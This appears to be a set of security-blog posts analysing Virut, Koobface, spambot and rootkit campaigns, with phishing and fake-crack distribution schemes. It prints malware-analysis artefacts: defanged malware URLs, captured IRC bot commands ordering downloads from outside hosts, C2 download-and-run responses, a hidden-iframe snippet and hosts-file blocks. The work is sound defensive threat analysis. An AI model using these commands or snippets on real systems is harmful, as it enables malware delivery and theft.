Are viruses the thing of yesteryear? Not at all. Is it another 29A, another group of kids looking for some thrills and recognition of their virus writing skills? No. What we find is that the hosting server, the downloads, and the multiple layers of effort are well orchestrated and financially motivated.

The family uses all sorts of tricks to distribute itself and many other components. Much has already been written on its changing infection, encryption, memory residence, injection, html file appending, and hooking techniques. But what is the group behind it up to now?
This summary will put together a few more key points on the threat’s current activity and its hosts. The threat itself comes from a number of servers and delivers a variety of malware. We’ll see that it is responsible for far more than infected files and Irc traffic, including adware, rootkits, password stealers, worms and spambots.

Virut’s current strain of executable infector is highly prevalent. The ThreatFire community has prevented tens of thousands of a couple of the newest Virut variants over the past couple of months. In fact, this executable infector is redeveloped quickly and often, and has been known to be buggy so that disinfection routines by the major Av vendors may end up corrupting the executable files that are meant to be cleaned when detected.

DO NOT VISIT THE MALICIOUS WEBSITES DESCRIBED HERE…

The first server that the current active Virut variant attempts to connect with is irc.zief.pl, oddly enough, over port 80 for its IRC session. It joins one of the channels there to receive private messages instructing it to download more malware:

NICK xxx
USER xxx. . :#xxx Service Pack 3
JOIN #.xxx

:u. PRIVMSG xxx:!get hxxp://cock.8866. org:88/files/adx.gif (Spyware downloader)
:u. PRIVMSG xxx:!get hxxp://dl.guarddog2009. com/cw.exe (Koobface variant)
:u. PRIVMSG xxx:!get hxxp://goasi. cn/ex/a.php (serves “load.exe” malicious downloader)
:u. PRIVMSG xxx:!get hxxp://85.114.131. 69/ad2.exe (malicious ad-popper)
PING :l.
PONG :l.
PING :l.
PONG :l.

Of those domains, it is interesting that the “dl.guarddog2009.com” is actively serving Koobface worm variants and ad popupers, considering that they are peddling scareware/rogueware from the same ip. Avoid it:

Once running, these additional pieces of malware download other nastiness in the background:
hxxp://avhtm.8866. org/files/av.htm (spambot dropper)
a POST is sent to main15052009. com/achcheck.php
hxxp://74.52.164. 210/pk/bb021908.exe (malicious downloader)

another POST is sent up to main15052009. com/ld/gen.php, with a recognizable Koobface response:
#PID=xxx
START|hxxp://www.i-site. ph/1/6244.exe (Bho dropper)
START|hxxp://www.i-site. ph/1/nfr.exe (proxy component)
WAIT|120
#BLACKLABEL
EXIT

hxxp://ji-u. cn/506.exe <-- hxxp://goasi. cn/dll/abb.txt (renamed to reader_s.exe and run, an updated Virut backdoor variant)

An unusual user-agent rears its head:
GET /ad2.exe HTTP/1.0 (malicious ad-popper listed above)
User-Agent: Download
Host: 85.114.131.69
Pragma: no-cache
(Incidentally, 85.114.131.69 is the host to s2.zief. pl and dl.guarddog2009. com.)

Additional files downloaded:
hxxp://ipkipk.3322. org/ipk.exe (downloader/adclick component)
hxxp://xz.wanggui. com/mem322.exe (downloader for password stealers)
hxxp://www.dofulfill . net/loadersvc.exe

All the while, in the background, multiple phantom queries are sent out to multiple servers, in an effort to increase click traffic at various sites, including job sites.

And then comes the spam. Infected machines spew spam containing messages like
“If you don’t feel like a complete person because you can’t afford luxury things to look stylish and elegant, you can forget about this feeling. We offer you fantastic deals on fantastic watches.”
A link is included that takes you to a “group” at a major provider, where knockoff watches and bags appear to be for sale. A click on an image redirects the user to sites like “trylamp. com”. Often, other pieces of spam carry offers for pills of all kinds.

An example email blast sent out right now with the subject line “Bank of America Security Department: How to Update Software” warns the receiving user that “Automatic Installation failed for Bank of America certificate component” and provides a bank-sounding link, persuading the user to visit the site. A user could easily be confused by the url, as seen in a browser bar here:

Notice that the link is not “bofa.com” or “bankofamerica.com”, but instead, “767certificate.com” (many other confused urls are being used in this ongoing scheme). When the link is visited with a browser, the center of the deceptively accurate page presents a demo video and automatically prompts the users to install an “Adobeflashplayer.exe“. As can be seen at this ThreatExpert report, this malware is not a Flash installer. This screenshot shows the certificate warning “You have not been permitted to access the Bank of America Direct login page because your browser did not provide a valid digital certificate” and the accompanying popup for the “Adobeflashplayer.exe” malware download. DO NOT download and run this file:

ThreatFire prevents many behaviors exhibited by this malware as Spyware.Ursnif when protecting a clean system. When ThreatFire is installed on system previously infected with the spyware and its rootkit, ThreatFire will identify the hidden new_drv.sys rootkit driver as Rootkit.Agent and hidden 9129837.exe (randomly named) executable copied to c:\windows, and associated registry keys when a rootkit Intelliscan is run. ThreatFire also quarantines it all properly when selected.

In one of the most prevalent social engineering schemes of this half of the year, users clicking on a spammed link are directed to a web page with a phony video. The user’s browser then displays a request to update their Adobe Flash version to play the video. This time, the malicious executable’s download name is “Adobe_Flash9.exe“. Users seem to be enticed into clicking links with the text “Proceed to the election results news page” and then running this file.
As always, avoid interacting with messages and links that seem questionable.

Another interesting Obama-related file just hitting our community this afternoon has been an infected executable containing a copy of President-elect Barack Obama’s entire acceptance speech: “obama’s presidential speech.exe“. This one just appears to be run from a system previously infected with a virus with the family name of “Nakuru” or “Kespo”. Symantec’s research team calls it W32.Tupofse.B.
The exe drops the original copy of the .doc file to disk before dropping other viral code, like kspoold.exe. When run, the original .doc file is opened and the entire speech appears:
“If there is anyone out there who still doubts that America is a place where all things are possible; who still wonders if the dream of our founders is alive in our time; who still questions the power of our democracy, tonight is your answer…”
Be sure to pay attention to file extensions before double-clicking on files. The icon for the file is altered by the virus so that it appears to be associated with Word, with a .doc extension, but it only has a .exe extension. Here is an image of the file, on a system that doesn’t have Microsoft Word installed on it (the icon normally never appears for .doc files, the wordpad icon should appear by default):

Another worm is propagating with a .com extension, which is actually an executable format on Windows systems. The file, when run, drops a copy of itself to the system32 directory as “symlasvc.exe” or “symlssdr.exe”, and hides its process from monitoring tools with rootkit components. In both cases, it adds itself to the Run key as the “Symantec Administration Service” so that it starts at every boot. Among other activities, it kills a set of tools that may be used to identify its presence on the system, and mangles the hosts file to prevent access to security information, security software and security update sites, including this blog. Here is an example:
127.0.0.1 blog.threatfire.com
127.0.0.1 www.threatexpert.com
127.0.0.1 blog.hispasec.com
127.0.0.1 mailcenter.rising.com.cn
127.0.0.1 mailcenter.rising.com
127.0.0.1 www.rising.com.cn
127.0.0.1 www.rising.com

ThreatFire currently is preventing these worms as “Worm.Injector”. In the past, we’ve seen similarly effective social engineering schemes:
MSN IM Worm
Surge in IM worm activity — don’t look at that cute puppy
New Undetected Worm
Bot on the loose — careful with images

Please do not run these files when they arrive.

Homer’s Ulysses wanders for years, returning to his home and his family in disarray. Initially, the only witness to recognize Ulysses in his home is his old dog Argus, faithfully waiting for his master’s return over those 20 years: “As soon as he saw Odysseus standing there, he dropped his ears and wagged his tail, but he could not get close up to his master. When Odysseus saw the dog on the other side of the yard, dashed a tear from his eyes…But Argos passed into the darkness of death, now that he had seen his master once more.”

Edward Fitzgerald’s “The Rubaiyat of Omar Khayyam” speculates on the importance of understanding the inability to return:
“Then to the lip of this poor earthen Urn
I lean’d, the Secret of my Life to learn:
And Lip to Lip it mumur’d — “While you live
Drink! — for, once dead, you never shall return”

Unfortunately, in our last round of spambots, we find lots of return. However, these returns do not provide deep insight or wistful second comings. Instead, these returns serve to obfuscate the functionality of the rootkit driver component (”pgasghjd.sys”) that appears to be the newest project of one of the rustock creators:
C:\progz\NewWork2\driver\objfre\i386\driver.pdb

Return is a powerful computing concept, and an important part of any CPU instruction set. The “RET” or “Return from procedure” instruction “transfers control to a return address located on the top of the stack”.
These returns are used in an unusual way in the unpacking stub of the driver, avoiding making standard calls early in the routine. Here is the driver’s entry point.

Notice the push of a hard-coded offset and the immediate return. This unusual sequence of assembly instructions simply pushes a return address to the stack, only to take control when the “ret” or “retn” is executed and control flows to this new offset. This sequence can be used as an effective emulator evasion trick.

These returns do not provide anything all that valuable, instead, these returns help to produce the unwanted spam, clogging global network pipes and peddling “male enhancement” drugs. These are the messages that are crass and vain, including with them a link to a couple of these “drug” peddling web sites. Obscene messages are not reproduced here, but here are a few examples:
“Give your chick a night to remember”
“Make sure you don’t get left out of the action at parties”
“Fantastic results guaranteed”

Some returns come with really bad literature.

Some slight changes in the newest version: circulating with the name “newphoto011.jpeg-www.myspace.com”, which I’m sure will change soon enough. This time, it hides a new process that loads “msnp2pmgr.exe”. The authors keenly call it their “MSN P2P Manager”. It connects back to xili.zerolost.org, hosted at a number of ip’s…Addresses: 64.34.203.207, 66.135.32.35, 195.137.213.67, 195.149.74.40, 195.149.74.67, 64.34.161.89, 64.34.202.227.

The authors seem to be getting a bit more aggressive against security solutions, delivering a long list of modifications to the hosts file with their worm that can be seen on this ThreatExpert report (look to the bottom of the report under “The HOSTS file was updated with the following URL-to-IP mappings”). These modifications prevent a user from visiting sites that may describe this worm as malicious, and also block security solutions from downloading signature updates as well.

AV scanner detection catching up:

The filename bundles carry a common theme for a downloader that delivers more than a user would expect. Crack.exe, keygen.exe, patch.exe and install.exe have been bundled within phony cracks and released to a number of sites. They contain trojan downloaders, among other things, pulling down and executing spambot variants and many other malware executables, including our old friend Vundo. Here are just a handful of the bundle names that we’ve been seeing:
Microsoft_Office_Professional_Plus_2007.txt.exe
WINDOWSXPSP2ACTIVATIONCRACK.ZIP.EXE
popcapzumadeluxe!v1.0crack.zip.exe
COMMAND_AND_CONQUER_GENERALS_ZERO_HOUR_MULTI_KEYGEN_BY_FFF.ZIP.EXE
MAGICISO_V3.5_BUILD_0064.ZIP.EXE
WINDOWS_XP_HOME_EDITION_OEM_BUILD_2600_ACTIVATION_CRACK_BY_AMOL_A._MORE.ZIP.EXE
nero_8.2.8.0_serial.txt.exe
DYNOMITE_DELUXE_V2.71.ZIP.EXE
WARCRAFT_3_REIGN_OF_CHAOS_BY_RAZOR.ZIP.EXE
osadobephotoshopcs2tryouttofullactivationkeygenoscaria.zip.exe
SONIC_FOUNDRY_ACID_PRO_V4.0B.ZIP.EXE
ADOBE_PHOTOSHOP_CS2_CS2_SERIAL_NUMBER.TXT.EXE

Notice the clever(?) use of the double file extension, ending in .zip.exe or .txt.exe. DO NOT download and run these files.

In our labs, we find that running these files results in a ridiculous attack. The volume of malware that ends up running on the system is so large that the system becomes entirely unusable. We haven’t seen an attack quite so bad since the 2nd-thought.com site was taken down.

One of the components infects services.exe on the system (often named “axer.exe”), and drops rootkit and spambot components (surprisingly, we see a consistent driver filename “pqasghjd.sys”), sending out waves of spam from this system process. The kernel level driver component hooks SSDT entries NtCreateKey, NtOpenKey and NtTerminateProcess, in an attempt to hide registry keys and prevent termination of the malware’s user-mode processes. It also attaches to the Ntfs file system driver, in order to obscure access to its presence on-disk.

The spambot components download updated lists of user accounts and available smtp servers over http, and then peddles rather “adult” themes in outgoing messages. All of the messages include a link to phony “personal growth” pills for men. Here are a couple of “mentionable” subject lines, just to get a small percentage of users to actually open the message:
“Life will get better with this”
“Wanna know why she’s hot”
“Jessica Alba bikini pics”
“All the love you need”
“Scarlett Johansson and Justin Timberlake spotted together”
“Get ready for a stunning improvement to your love life”
“Scarlett Johansson and Tom Brady spotted in Mexico”

“A new powerful disaster just occurred in China. The most deadly, 9 magnitude, earthquake took away million of lives in the heart of China, Beijing. Rapidly growing panic paralyzed life of Chinese capital. 2008 Olympic Games are under the threat of failure. Click on the video to see the details of this terrible disaster and choose either “Open” or “Run”.”

Do not visit the website:

Of course, instead of a link to a video, the code behind the “mov.gif” image of a video object directs the user to download “beijing.exe“, seen as “beijing[1].exe” on TF users’ systems. When run, this executable drops and starts “msvupdater.exe” in the windows directory on the system. The msvupdater component carries with it the familiar P2P code that Storm uses, and attempts to send out email from the system.

Hidden away in the last line of html source is tiny iframe linking to “ind.php”, as seen here:
iframe src=”ind.php” width=”1″ height=”1″ style=”visibility:hidden;position:absolute”

This php file contains quite a bit of obfuscated javascript. After dissecting the script, we find that it is attacking an older NCTAudioFile2 ActiveX vulnerability, the more recent RealPlayer vulnerability, a older BaiduBar Soba vuln, and a couple of ancient setSlice and WebFolderView vulnerabilities. Basically, these guys have a newer commodity attack kit with some new obfuscation features.

Instead, this trojan downloads “cb_1.exe” and runs it, installing multiple password stealing and rootkit components that are not new (but this version of the fraudulent scheme is new). The components, including 9129837.exe (Spyware.Papras) and new_drv.sys (Rootkit.Agent.ex) will steal all web form input (from any and all banks, for example), most any other stored passwords on the system, and send the data off to a server hosted in Singapore.

This malicious dropper executable is being distributed from web sites via a set of exploits targeting a vulnerability patched in 2003, the common Microsoft MDAC (MS06-014) vulnerabilities that we see targeted on a daily basis, along with the somewhat more recent VML and XML CoreServices BoF.